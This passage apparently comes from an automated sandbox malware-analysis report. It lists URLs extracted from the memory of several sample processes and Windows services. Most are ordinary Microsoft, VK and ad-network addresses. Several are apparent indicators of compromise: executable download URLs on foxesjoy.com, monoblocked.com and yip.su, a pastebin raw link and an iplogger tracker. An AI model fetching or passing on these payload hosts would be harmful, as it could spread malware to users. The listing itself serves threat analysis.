                  Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000034.00000002.2848786345.000001F4D9671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
                  Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.vk.com/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.vk.com/?act=login
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.vk.com/?act=logout&hash=d4e90dd89b51cf03c1&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe8
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exeb_
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exeh
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exez
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lop.foxesjoy.com:80/ssl/crt.exeBt
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exe8
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exeI
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exeU
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exeom/a
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exeAy
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exeeska
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exehudp(
                  Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://orion.ts.360.com/promo/opera?ch=%s&sch=%s&ver=%s&lan=%s&os=%s&mid=%s&mver=%s&time=%I64d/down
                  Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://papi.vk.com/pushsse/ruim
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV3
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7000000.00000004.00001000.00020000.00000000.sdmp, lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2511302805.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platform.twitter.com
                  Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r.mradx.net
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com
                  Source: lgX7lgUL1w.exeString found in binary or memory: https://sectigo.com/CPS0
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net
                  Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/base.3a6f1d6d.css
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/common.e499224c.css
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/fonts_cnt_async.4881739c.css
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.css
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/al/vkui.c63ec9ec.css
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st6-20.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.vk.me
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stats.vk-portal.net
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sun6-20.userapi.com/c909228/u5294803/docs/d35/91095a9a6f06/gewgdggrwh_20240521161330.bmp?ext
                  Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                  Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                  Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 00000009.00000003.1389103968.000002B17165D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
